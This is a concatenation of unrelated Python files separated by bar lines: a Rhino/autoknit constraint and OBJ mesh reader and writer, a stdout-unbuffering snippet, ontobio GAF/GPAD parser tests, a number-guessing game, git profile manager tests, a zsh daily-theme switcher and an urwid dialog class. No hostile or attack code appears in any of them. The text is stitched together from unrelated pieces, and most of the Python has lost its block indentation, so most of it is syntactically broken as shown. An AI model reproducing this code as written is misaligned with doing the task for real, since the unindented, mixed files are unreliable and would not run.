def _read_vector_sequence(instream, structure, name):
"""
Reads a sequence of vectors from the stream using the given structure.
"""
try:
count = _read_scalar(instream, name + " count")
vectors = [_read_vector(instream,
structure,
name + " {}".format(i)) for i in range(count)]
return vectors
except Exception as e:
raise RuntimeError("Failed to read vector sequence " +
"{} // {}".format(name, str(e)))
def _write_vector_sequence(outstream, sequence, structure, name):
"""Writes a sequence of vectors to the stream using the given structure."""
try:
count = len(sequence)
_write_scalar(outstream, count, name + " count")
for i, v in enumerate(sequence):
_write_vector(outstream, v, structure, name + " {}".format(str(i)))
return True
except Exception as e:
raise RuntimeError("Failed to write vector sequence " +
"{} // {}".format(name, str(e)))
# LOADING AND SAVING OF CONSTRAINTS (PUBLIC) ----------------------------------
def LoadConstraints(filepath):
"""Loads autoknit constraints from a binary *.cons file."""
with open(filepath, "rb") as f:
try:
vertices = _read_vector_sequence(f,
Structs.STRUCT_VERTEX,
"vertices")
constraints = _read_vector_sequence(
f,
Structs.STRUCT_STOREDCONSTRAINT,
"constraints")
return True, vertices, constraints
except Exception as e:
print(e)
return False, e
def SaveConstraints(filepath, vertices, constraints):
"""Saves constraints to a binary *.cons file compatible with autoknit."""
try:
with open(filepath, "wb") as f:
vertices = list(itertools.chain.from_iterable(vertices))
_write_vector_sequence(f,
vertices,
Structs.STRUCT_VERTEX,
"vertices")
constraints = [c.Storable for c in constraints]
_write_vector_sequence(f,
constraints,
Structs.STRUCT_STOREDCONSTRAINT,
"constraints")
except Exception as e:
print(e)
raise RuntimeError("Could not write constraints file!")
# INTERPRETATION OF SAVED CONSTRAINTS -----------------------------------------
def InterpretStoredConstraints(points, storedconstraints):
"""Interprets the results of loading a *.cons file and builds
Autoknit Constraints from them."""
points = deque(points)
constraints = []
for i, c in enumerate(storedconstraints):
vertices = [points.popleft() for x in range(c.Count)]
constraints.append(Constraint(i, vertices, c.Value, c.Radius))
return constraints
# LOADING AND SAVING OF MODELS (OBJ FILES) ------------------------------------
def LoadObj(filepath):
"""Reads from an *.obj file and returns a mesh"""
# create a new, empty Rhino mesh
model = RhinoMesh()
# read from the file in text mode
with open(filepath, "rt") as f:
while True:
#scriptcontext.escape_test()
# read a line and split it into parts
line = f.readline()
if not line:
break
# split the line into parts
parts = str.split(line, " ")
token = parts[0]
data = parts[1:]
# catch empty line as delimiter
if not parts or parts == [""]:
continue
# catch vertices
elif token == "v":
# add vertex
vx, vy, vz = [float(c) for c in data]
vertex = RhinoPoint3f(vx, vy, vz)
model.Vertices.Add(vertex)
# catch faces
elif token == "f":
# add face
if len(data) == 3:
# implementation detail: Rhino vertex indices are 0-based
va, vb, vc = [int(i)-1 for i in data]
model.Faces.AddFace(va, vb, vc)
elif len(data) == 4:
# implementation detail: Rhino vertex indices are 0-based
va, vb, vc, vd = [int(i)-1 for i in data]
model.Faces.AddFace(va, vb, vc, vd)
return model
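# For reference, LoadObj only understands the minimal "v"/"f" subset of the OBJ
# format, e.g. a single triangle (vertex indices are 1-based in the file):
#
#   v 0.0 0.0 0.0
#   v 1.0 0.0 0.0
#   v 0.0 1.0 0.0
#   f 1 2 3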
def SaveObj(filepath, mesh):
"""Saves a Rhino mesh as an *.obj file."""
# run some checks on the input
if not mesh or type(mesh) is not RhinoMesh:
raise ValueError("Supplied mesh is not a valid Rhino mesh!")
if not filepath or type(filepath) is not str:
raise ValueError("Supplied filepath is not a valid filepath!")
# remove trailing newlines from the filepath and check for file extension
filepath = path.normpath(filepath.rstrip("\n\r"))
if not filepath.lower().endswith(".obj"):
filepath = filepath + ".obj"
# extract vertex coordinates from the mesh and build strings
mv = list(mesh.Vertices.ToPoint3dArray())
vertices = ["v {} {} {}\n".format(v.X, v.Y, v.Z) for v in mv]
# extract faces from the mesh and build obj strings
fids = deque(mesh.Faces.ToIntArray(False))
temp = deque()
faces = deque()
while len(fids) > 0:
# scriptcontext.escape_test()
# if face is complete, check if it is a triangle, append and reset temp
if temp and len(temp) == 4:
if temp[-2] == temp[-1]:
temp.pop()
faces.append(("f" + (" {}" * len(temp)) + "\n").format(*temp))
temp.clear()
else:
# standard procedure - just add index to temp
temp.append(fids.popleft() + 1)
else:
# handle trailing face at the end
if len(temp) > 0:
if len(temp) == 4 and temp[-2] == temp[-1]:
temp.pop()
faces.append(("f" + (" {}" * len(temp)) + "\n").format(*temp))
temp.clear()
# open the file and write all the collected data to it
with open(filepath, "wt") as f:
# write the header to the file
f.write("# Rhino Grasshopper OBJ exporter by Max Eschenbach\n")
f.write("\n")
f.write("# Mesh Vertices\n")
f.writelines(vertices)
f.write("\n")
f.write("# Mesh Faces\n")
f.writelines(faces)
# MAIN ------------------------------------------------------------------------
if __name__ == '__main__':
pass
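    # Illustrative usage sketch (commented out: it assumes a Rhino/Grasshopper
    # environment and example file paths that are not part of this module):
    #
    #   ok, vertices, constraints = LoadConstraints("constraints.cons")
    #   mesh = LoadObj("model.obj")
    #   SaveObj("model_roundtrip.obj", mesh)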
|
import os
import sys
original = sys.stdout
original.flush()
unbuffered = os.fdopen(original.fileno(), 'w', 0)
sys.stdout = unbuffered
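# Note: opening a text-mode stream with buffering=0 (as above) only works on
# Python 2; Python 3 rejects unbuffered text I/O. A rough Python 3 equivalent
# (an assumption, not part of the original snippet) would be:
#
#   import io
#   sys.stdout = io.TextIOWrapper(open(original.fileno(), 'wb', 0), write_through=True)
#
# or simply running the interpreter with `python -u`.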
|
from ontobio.io import assocparser
from ontobio.io.gpadparser import GpadParser
from ontobio.io import gafparser
from ontobio.io.gafparser import GafParser
from ontobio.io import GafWriter
from ontobio.io.assocwriter import GpadWriter
from ontobio.assoc_factory import AssociationSetFactory
from ontobio.ontol_factory import OntologyFactory
from ontobio.model import association
from ontobio.rdfgen import relations
from ontobio.ecomap import EcoMap
ecomap = EcoMap()
ecomap.mappings()
import tempfile
import logging
import pytest
import io
import json
POMBASE = "tests/resources/truncated-pombase.gaf"
POMBASE_GPAD = "tests/resources/truncated-pombase.gpad"
ONT = "tests/resources/go-truncated-pombase.json"
QGAF = "tests/resources/test-qualifiers.gaf"
def test_skim_gaf():
p = GafParser()
p.config.ecomap = EcoMap()
results = p.skim(open(POMBASE, "r"))
assert len(results) == 370
for r in results:
print(str(r))
(s, sn, o) = r
assert o.startswith('GO:')
assert s.startswith('PomBase:')
def test_skim_gaf_qualifiers():
p = GafParser()
p.config.ecomap = EcoMap()
p.config.remove_double_prefixes = True
results = p.skim(open(QGAF, "r"))
for r in results:
print(str(r))
(s, sn, o) = r
assert o.startswith('GO:')
assert s.startswith('MGI:') or s.startswith('PomBase')
assert len(results) == 5 # ensure NOTs are skipped
p.config.exclude_relations = ['contributes_to', 'colocalizes_with']
results = p.skim(open(QGAF, "r"))
for r in results:
(s, sn, o) = r
assert o.startswith('GO:')
assert s.startswith('MGI:') or s.startswith('PomBase')
assert len(results) == 3 # ensure NOTs and excludes relations skipped
def test_one_line():
p = GafParser(config=assocparser.AssocParserConfig(
ontology=OntologyFactory().create("tests/resources/goslim_generic.json")))
parsed = p.parse_line("PomBase SPBC16D10.09 pcn1 GO:0009536 PMID:8663159 IDA C PCNA pcn protein taxon:4896 20150326 PomBase")
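# For reference, the tab-separated columns of the GAF 2.x lines used throughout
# these tests are: DB, DB Object ID, DB Object Symbol, Qualifier, GO ID,
# DB:Reference, Evidence Code, With/From, Aspect, DB Object Name, DB Object
# Synonym, DB Object Type, Taxon, Date, Assigned By, Annotation Extension,
# Gene Product Form ID (the last two columns may be empty).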
def test_skim_gpad():
p = GpadParser()
p.config.ecomap = EcoMap()
results = p.skim(open(POMBASE_GPAD, "r"))
assert len(results) == 1984
for r in results:
print(str(r))
(s, sn, o) = r
assert o.startswith('GO:')
assert s.startswith('PomBase:') or s.startswith('PR:')
def test_parse_gaf():
parse_with(POMBASE, GafParser())
def test_parse_gpad():
parse_with(POMBASE_GPAD, GpadParser())
def parse_with(f, p):
p.config.ecomap = EcoMap()
is_gaf = f == POMBASE
ont = OntologyFactory().create(ONT)
if is_gaf:
# only do ontology checking on GAF parse;
# this is because ontology is made from GAF
p.config.ontology = ont
else:
p.config.ontology = None
results = p.parse(open(f, "r"), skipheader=True)
print(p.report.to_markdown())
r1 = results[0]
# TODO: test datafile does not have ECOs yet!!
assert ecomap.ecoclass_to_coderef(str(r1.evidence.type))[0] == 'ISO' or str(r1.evidence.type) == 'ECO:0000201'
assert r1.evidence.with_support_from == [association.ConjunctiveSet([association.Curie.from_str('SGD:S000001583')])]
assert r1.evidence.has_supporting_reference == [association.Curie.from_str('GO_REF:0000024')]
if is_gaf:
assert r1.subject.label == 'ypf1'
assert association.ymd_str(r1.date, "") == '20150305'
for r in results:
#print(str(r))
sid = r.subject.id
prov = r.provided_by
assert prov == 'PomBase' or prov == 'UniProt'
assert r.object.id.namespace == "GO"
assert sid.namespace == 'PomBase' or (not is_gaf and sid.namespace == 'PR')
if is_gaf:
assert str(r.subject.taxon) =='NCBITaxon:4896'
# for m in p.report.messages:
# print("MESSAGE: {}".format(m))
print("MESSAGES (sample): {}".format(p.report.messages[0:5]))
# Messages that aren't about upgrading qualifiers in rule 59 should be 0
assert len([msg for msg in p.report.messages if msg["rule"] != 59]) == 0
# print(p.report.to_markdown())
def test_flag_invalid_id():
ont = OntologyFactory().create(ONT)
p = GafParser()
p.config.ontology = ont
p._validate_ontology_class_id("FAKE:1", assocparser.SplitLine("fake", [""]*17, taxon="foo"))
assert len(p.report.messages) == 1
def test_no_flag_valid_id():
ont = OntologyFactory().create(ONT)
p = GafParser()
p.config.ontology = ont
p._validate_ontology_class_id("GO:0000785", assocparser.SplitLine("fake", [""]*17, taxon="foo"))
assert len(p.report.messages) == 0
def test_convert_gaf_to_gpad():
p = GafParser()
p.config.ecomap = EcoMap()
w = GpadWriter()
p2 = GpadParser()
convert(POMBASE, p, w, p2)
def convert(file, p, w, p2):
assocs = p.parse(file, skipheader=True)
outfile = tempfile.NamedTemporaryFile(mode='w', delete=False)
w.file = outfile
for a in assocs:
w.write_assoc(a)
outfile.close()
assocs2 = p2.parse(outfile.name)
for a in assocs2:
print("REPARSED: {}".format(a))
assert len(assocs) == len(assocs2)
def test_invalid_goid_in_gpad():
# Note: this ontology is a subset of GO extracted using the GAF, not GPAD
p = GpadParser()
p.config.ontology = OntologyFactory().create(ONT)
results = p.parse(open(POMBASE_GPAD, "r"), skipheader=True)
# we expect errors since ONT is not tuned for the GPAD file
# for m in p.report.messages:
# print("MESSAGE: {}".format(m))
assert len(p.report.messages) > 500
print(p.report.to_markdown())
def test_validate_go_idspaces():
ont = OntologyFactory().create(ONT)
p = GafParser()
p.config.class_idspaces = ['FOOZ']
assocs = p.parse(open(POMBASE, "r"), skipheader=True)
for m in p.report.messages:
print("MESSAGE: {}".format(m))
assert len(assocs) == 0
assert len(p.report.messages) > 1
summary = p.report.to_report_json()
assert summary['associations'] == 0
assert summary['lines'] > 300
print(p.report.to_markdown())
# ensure config is not preserved
p = GafParser()
assert p.config.class_idspaces == None
#POMBASE_GPAD = "tests/resources/truncated-pombase.gpad"
def test_qualifiers_gaf():
# ont = OntologyFactory().create(ONT)
p = GafParser()
# p.config.ontology = ont
assocs = p.parse(open(QGAF, "r"), skipheader=True)
neg_assocs = [a for a in assocs if a.negated == True]
assert len(neg_assocs) == 3
for a in assocs:
print('REL: {}'.format(str(a.relation)))
assert len([a for a in assocs if str(a.relation) == 'RO:0002326']) == 1
# For the space in `colocalizes with`
assert len(list(filter(lambda e: e["obj"] == "colocalizes with", p.report.to_report_json()["messages"]["gorule-0000001"]))) == 1
assert len(list(filter(lambda e: e["obj"] == "involved_in", p.report.to_report_json()["messages"]["gorule-0000001"]))) == 1
def test_qualifiers_gaf_2_2():
p = GafParser()
assocs = p.parse(open("tests/resources/test-qualifiers-2.2.gaf"), skipheader=True)
# NOT by itself is not allowed
assert len(list(filter(lambda e: e["obj"] == "NOT", p.report.to_report_json()["messages"]["gorule-0000001"]))) == 1
assert len(list(filter(lambda e: e["obj"] == "contributes_to|enables", p.report.to_report_json()["messages"]["gorule-0000001"]))) == 1
assert len([a for a in assocs if association.Curie.from_str("RO:0004035") in a.qualifiers]) == 1
def test_gaf_2_1_creates_cell_component_closure():
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
closure = gafparser.protein_complex_sublcass_closure(ontology)
# "GO:1902494" as an example that should be in the set
assert "GO:0005840" in closure
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
with open("tests/resources/pombase_single.gaf") as gaf:
# First line will be version declaration, triggering closure computation
p.parse_line(gaf.readline())
assert "GO:0005840" in p.cell_component_descendants_closure
def test_gaf_2_1_qualifiers_upconvert():
line = ["SGD", "S000000819", "AFG3", "", "GO:0005840", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P", "Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene", "taxon:559292", "20170428", "SGD"]
parsed = gafparser.to_association(line)
assoc = parsed.associations[0]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
assoc = p.upgrade_empty_qualifier(assoc)
assert assoc.qualifiers[0] == association.Curie(namespace="BFO", identity="0000050")
def test_gaf_2_1_upconvert_in_parse():
gaf = io.StringIO("!gaf-version: 2.1\nSGD\tS000000819\tAFG3\t\tGO:0005840\tPMID:8681382|SGD_REF:S000055187\tIMP\t\tP\tMitochondrial inner membrane m-AAA protease component\tYER017C|AAA family ATPase AFG3|YTA10\tgene\ttaxon:559292\t20170428\tSGD")
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
# We're 2.1, qualifier blank, cell component term from above, ontology defined: should upgrade
assocs = p.parse(gaf, skipheader=True)
assert assocs[0].relation == association.Curie(namespace="BFO", identity="0000050")
def test_gaf_2_1_simple_terms():
line = ["SGD", "S000000819", "AFG3", "", "GO:0006259", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P", "Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene", "taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0002264")
line = ["SGD", "S000000819", "AFG3", "", "GO:0042393", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P",
"Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene",
"taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0002327")
line = ["SGD", "S000000819", "AFG3", "", "GO:0005773", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P",
"Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene",
"taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0001025")
def test_upgrade_qualifiers_for_biological_process():
line = ["SGD", "S000000819", "AFG3", "", "GO:0008150", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P",
"Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene",
"taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0002331")
def test_upgrade_qualifiers_for_cell_component():
line = ["SGD", "S000000819", "AFG3", "", "GO:0008372", "PMID:8681382|SGD_REF:S000055187", "IMP", "", "P",
"Mitochondrial inner membrane m-AAA protease component", "YER017C|AAA family ATPase AFG3|YTA10", "gene",
"taxon:559292", "20170428", "SGD"]
ontology = OntologyFactory().create("tests/resources/goslim_generic.json")
p = GafParser(config=assocparser.AssocParserConfig(ontology=ontology))
p.make_internal_cell_component_closure()
parsed = gafparser.to_association(line)
assoc = p.upgrade_empty_qualifier(parsed.associations[0])
assert assoc.qualifiers[0] == association.Curie(namespace="RO", identity="0002432")
def test_default_gaf_version():
p = GafParser()
assocs = p.parse(open("tests/resources/test-qualifiers-no-version.gaf"), skipheader=True)
assert p.version == "2.1"
def parse_with2(f, p):
ont = OntologyFactory().create(ONT)
p.config.ontology = ont
assocs = p.parse(open(f, "r"), skipheader=True)
neg_assocs = [a for a in assocs if a.negated == True]
assert len(neg_assocs) == 3
for a in assocs:
print('REL: {}'.format(a.relation))
assert len([a for a in assocs if str(a.relation) == relations.lookup_label('involved_in')]) == 1
assert len([a for a in assocs if str(a.relation) == relations.lookup_label('contributes_to')]) == 1
def test_errors_gaf():
config = assocparser.AssocParserConfig(
ecomap=EcoMap()
)
p = GafParser(config=config)
assocs = p.parse(open("tests/resources/errors.gaf", "r"), skipheader=True)
msgs = p.report.messages
print(json.dumps(p.report.to_report_json(), indent=4))
# print("MESSAGES: {}".format(len(msgs)))
n_invalid_idspace = 0
for m in msgs:
print("MESSAGE: {}".format(m))
if m['type'] == assocparser.Report.INVALID_IDSPACE:
n_invalid_idspace += 1
assert len(msgs) == 13
assert n_invalid_idspace == 1
assert len(assocs) == 2
w = GafWriter()
w.write(assocs)
for a in assocs:
if a.object_extensions != []:
# our test file has no ORs, so in DNF this is always the first
xs = a.object_extensions[0].elements
print(xs)
for x in xs:
print('X: {}'.format(x))
# ensure that invalid expressions have been eliminated
assert x.relation == association.Curie("BFO", "0000050")
assert x.term == association.Curie.from_str('X:1')
assert len(xs) == 1
ALT_ID_ONT = "tests/resources/obsolete.json"
def test_alt_id_repair():
p = GafParser()
ont = OntologyFactory().create(ALT_ID_ONT)
p.config.ecomap = EcoMap()
p.config.ontology = ont
gaf = io.StringIO("SGD\tS000000819\tAFG3\t\tGO:1\tPMID:8681382|SGD_REF:S000055187\tIMP\t\tP\tMitochondrial inner membrane m-AAA protease component\tYER017C|AAA family ATPase AFG3|YTA10\tgene\ttaxon:559292\t20170428\tSGD")
assocs = p.parse(gaf, skipheader=True)
    # GO:1 is obsolete and has been replaced by GO:2, so we should see that class ID.
assert assocs[0].object.id == association.Curie.from_str("GO:2")
gaf = io.StringIO("SGD\tS000000819\tAFG3\t\tGO:4\tPMID:8681382|SGD_REF:S000055187\tIMP\t\tP\tMitochondrial inner membrane m-AAA protease component\tYER017C|AAA family ATPase AFG3|YTA10\tgene\ttaxon:559292\t20170428\tSGD")
assocs = p.parse(gaf, skipheader=True)
# GO:4 is obsolete due to it being merged into GO:3
assert assocs[0].object.id == association.Curie.from_str("GO:3")
def test_gorule_repair():
config = assocparser.AssocParserConfig(
ontology=OntologyFactory().create("tests/resources/goslim_generic.json")
)
p = GafParser(config=config)
# Here this gaf line has the wrong aspect, and should be picked up by gorule 28
gaf = io.StringIO("PomBase\tSPCC962.06c\tbpb1\t\tGO:0005634\tPMID:20970342\tIPI\t\tP\tKH and CC/hC domain splicing factor Bpb1\tsf1|ods3\tprotein\ttaxon:4896\t20110804\tPomBase\tpart_of(GO:0007137)")
assocs = p.parse(gaf, skipheader=True)
assert assocs[0].aspect == "C"
assert len(p.report.to_report_json()["messages"]["gorule-0000028"]) == 1
assert p.report.to_report_json()["messages"]["gorule-0000028"][0]["type"] == assocparser.Report.VIOLATES_GO_RULE
def test_bad_date():
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\tTODAY\tPomBase\tfoo(X:1)")
assert assoc_result.skipped == True
assert assoc_result.associations == []
def test_subject_extensions():
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20181024\tPomBase\tpart_of(X:1)\tUniProtKB:P12345")
assert len(assoc_result.associations[0].subject_extensions) == 1
subject_extensions = assoc_result.associations[0].subject_extensions
gene_product_form_id = subject_extensions[0].term
assert gene_product_form_id == association.Curie.from_str("UniProtKB:P12345")
def test_bad_withfrom():
p = GafParser()
# With/from has no identity portion after the namespace
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20181024\tPomBase")
assert assoc_result.associations == []
assert p.report.to_report_json()["messages"]["gorule-0000001"][0]["obj"] == "SGD:"
def test_subject_extensions_bad_curie():
"""
Offending field is `GDP_bound`
"""
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPBC1289.03c\tspi1\t\tGO:0005515\tPMID:18422602\tIPI\tPomBase:SPAC25A8.01c\tF\tRan GTPase Spi1\t\tprotein\ttaxon:4896\t20080718\tPomBase\t\tGDP_bound")
assert assoc_result.associations == []
assert assoc_result.skipped == True
assert len(p.report.to_report_json()["messages"]["gorule-0000001"]) == 1
assert p.report.to_report_json()["messages"]["gorule-0000001"][0]["type"] == p.report.INVALID_ID
assert p.report.to_report_json()["messages"]["gorule-0000001"][0]["obj"] == "GDP_bound"
print(json.dumps(p.report.to_report_json(), indent=4))
def test_object_extensions():
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20181024\tPomBase\tpart_of(X:1)\tUniProtKB:P12345")
print(p.report.to_markdown())
assert len(assoc_result.associations[0].object_extensions) > 0
object_extensions = [
association.ConjunctiveSet([
association.ExtensionUnit(association.Curie("BFO", "0000050"), association.Curie("X", "1"))
])
]
assert assoc_result.associations[0].object_extensions == object_extensions
def test_object_extensions_error():
p = GafParser()
assoc_result = p.parse_line("PomBase\tSPAC25B8.17\typf1\t\tGO:0000007\tGO_REF:0000024\tISO\tSGD:S000001583\tC\tintramembrane aspartyl protease of the perinuclear ER membrane Ypf1 (predicted)\tppp81\tprotein\ttaxon:4896\t20181024\tPomBase\tpart_of(X)\tUniProtKB:P12345")
assert len(p.report.to_report_json()["messages"]["gorule-0000001"]) == 1
def test_factory():
afa = AssociationSetFactory()
ont = OntologyFactory().create(ONT)
aset = afa.create_from_file(POMBASE, ontology=ont, skim=False)
found = 0
for s in aset.subjects:
print('{} {}'.format(s, aset.label(s)))
for c in aset.annotations(s):
print(' {} {}'.format(c, ont.label(c)))
for a in aset.associations(s, c):
e = a['evidence']
print(' {} {} {}'.format(e['type'], e['with_support_from'], e['has_supporting_reference']))
if s == 'PomBase:SPBC2D10.10c' and c == 'GO:0005730':
if e['type'] == 'ISO':
if e['with_support_from'] == ['SGD:S000002172'] and e['has_supporting_reference'] == ['GO_REF:0000024']:
found +=1
logging.info('** FOUND: {}'.format(a))
if e['type'] == 'IDA':
if e['has_supporting_reference'] == ['PMID:16823372']:
found +=1
logging.info('** FOUND: {}'.format(a))
assert len(aset.associations_by_subj) > 0
assert found == 2
if __name__ == "__main__":
pytest.main(args=["tests/test_gafparser.py::test_parse_gaf"])
|
from random import randint
computador = randint(0, 10)
ntentativas = 0
print('''I am your computer...
I have just thought of a number between 0 and 10.
Can you guess which one it is?''')
jogada = int(input('What is your guess? '))
while jogada != computador:
    if jogada < computador:
        print('Higher... Try again.')
    if jogada > computador:
        print('Lower... Try again.')
    ntentativas += 1
    jogada = int(input('What is your guess? '))
print('You got it in {} attempt{}. Congratulations!'.format(ntentativas + 1, '' if ntentativas == 0 else 's'))
|
import io
import os
import sys
import pytest
from random import randrange
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + "/../")
import src.utils.messages as msg
from src.executor import executor, parser
from src.git_manager.git_manager import GitManager
from src.profile.profile import Profile
@pytest.fixture(autouse=True)
def prepare():
git = GitManager({})
profiles_to_add = []
# Generate 10 profiles
for i in range(10):
test = "test-local-{0}".format(i)
profile = Profile(test, test, None, test)
profiles_to_add.append(profile)
for p in profiles_to_add:
git.add_profile(p)
yield git
class TestDelProfile:
def test_del_profile_not_found(self, capsys):
test = "profile-{0}".format(randrange(100000))
arg_parser = parser.get_arguments_parser()
arguments = arg_parser.parse_args(["del", test])
executor.execute_command(arguments)
out, err = capsys.readouterr()
delmsg = msg.ERR_NO_PROFILE.format(test)
assert delmsg in out
assert not err
def test_del_profile_ok(self, capsys):
arg_parser = parser.get_arguments_parser()
for i in range(10):
test = "test-local-{0}".format(i)
arguments = arg_parser.parse_args(["del", test])
executor.execute_command(arguments)
delmsg = msg.INFO_DEL_SUCCESS.format(test)
out, err = capsys.readouterr()
assert delmsg in out
assert not err
|
import os
import re
import json
from sys import exit
from arguments import verify_args
# return the $HOME path
def get_home():
try:
return open('/home/.zshuserpath').readline().strip()
except FileNotFoundError:
return os.getenv('HOME')
# return the absolute path of a zsh config file,
# e.g. '/home/venturini/.zshrc'
def get_path(file):
home_path = get_home()
return os.path.join(home_path, file)
# open the ~/.zshrc or ~/.zshday
def open_file(file, mode='r'):
path = get_path(file)
return open(path, mode)
# read the ~/.zshday and return the new theme
# also, update the ~/.zshday file
def get_theme(zshday_file):
zshday_obj = json.load(zshday_file)
try:
theme_number = zshday_obj['theme_of_day']
# at the end of themes, come back to first theme
zshday_obj['theme_of_day'] = (theme_number + 1) % len(zshday_obj['themes'])
return zshday_obj['themes'][theme_number]
except Exception as ex:
#print(str(ex))
exit(1)
finally:
        # before leaving the function, update the .zshday file
json.dump(zshday_obj, open(get_path('.zshday'), 'w'), indent=2)
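# Example of the expected ~/.zshday contents (illustrative only; the theme names
# are placeholders):
#
#   {
#     "theme_of_day": 0,
#     "themes": ["robbyrussell", "agnoster", "af-magic"]
#   }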
# read the whole .zshrc file, then re-write every line,
# replacing the 'ZSH_THEME="*"' line with the new theme.
# reading everything up front is necessary because we read and write
# the same file
def update_theme(zshrc_file_reader, new_theme):
# read all zshrc lines
lines = zshrc_file_reader.readlines()
# open a new .zshrc file to write
    # open_file already resolves the path via get_path
    with open_file('.zshrc', 'w') as zshrc_file_writer:
for line in lines:
            # ignore lines that start with a comment "#"
            # and only check the remaining lines
            if not line.startswith('#') and re.match(r'ZSH_THEME="[\w-]+"\n', line):
line = 'ZSH_THEME="{}"\n'.format(new_theme)
zshrc_file_writer.write(line)
# open the ~/.zshrc file and the ~/.zshday file
# then select and change the theme name
def worker():
try:
zshrc_file = open_file('.zshrc')
zshday_file = open_file('.zshday')
        # if command-line arguments were given, let verify_args handle them first
verify_args(zshrc_file, zshday_file)
new_theme = get_theme(zshday_file)
update_theme(zshrc_file, new_theme)
except FileNotFoundError as ex:
pass
if __name__ == '__main__':
worker()
|
#!/usr/bin/env python
import form, app, urwid, layout, button
class Dialog (form.Form):
"""
A modular Form designed to be displayed over the top of other forms.
"""
def __init__ (self, parent, width, height, align='center', valign='middle', shadow=u'\u2592', top_widget=None):
"""
Initialise a dialog. Requires the same parameters as a Form, in addition:
parent: the UrwidApp parent.
width: the width of the dialog.
height: the height of the dialog.
align: where the dialog should be displayed horizontally.
valign: where the dialog should be displayed vertically.
shadow: the character to be used as a "drop shadow".
top_widget: the top widget of the form.
"""
self.width = width
self.height = height
self.align = align
self.valign = valign
self.shadow = shadow
self.result = None
self.showing_modal = False
form.Form.__init__(self, parent, top_widget)
def MakeShadow (self):
"""
Create a box widget that is displayed as the "shadow" of the dialog.
"""
return urwid.SolidFill(self.shadow)
def MakeOverlay (self):
"""
Builds a series of overlays: overlay1 consists of the shadow on top of the currently displayed widget. overlay2 consists of the dialog on top of the shadow.
"""
self.overlay1 = layout.OffsetOverlay(self.MakeShadow(), self.GetParent().GetCurrentWidget(), self.align, self.width, self.valign, self.height)
self.overlay2 = urwid.Overlay(self.GetTopWidget(), self.overlay1, self.align, self.width, self.valign, self.height)
return self.overlay2
def Show (self, discard_current=False):
"""
Shows the dialog on top of the currently displayed widget.
"""
assert self.GetTopWidget() is not None
self.GetParent().SetTopForm(self, not discard_current)
self.GetParent().Show(self.MakeOverlay())
def GotResult (self, result):
"""
A convenience function for parsing the "result" of a dialog. For modally displayed dialogs it merely stores the result. For non-modal dialogs, it dismisses the dialog as well as storing the result.
"""
if self.showing_modal:
def f (*args):
self.result = result
else:
def f (*args):
self.result = result
self.ShowPrevious()
return f
def ShowModal (self):
"""
        Enter into a sub-loop to display the dialog. All key inputs will be passed to the relevant sub-widgets. The function will block until a "result" is gathered from the dialog (pressing a key, selecting a button, providing a relevant value, etc), at which point the result will be returned to the caller.
"""
self.showing_modal = True
self.Show()
self.result = None
parent = self.GetParent().main_loop
while not self.result:
parent.draw_screen()
keys = None
while not keys:
keys, raw = parent.screen.get_input(True)
keys = parent.input_filter(keys, raw)
if keys:
parent.process_input(keys)
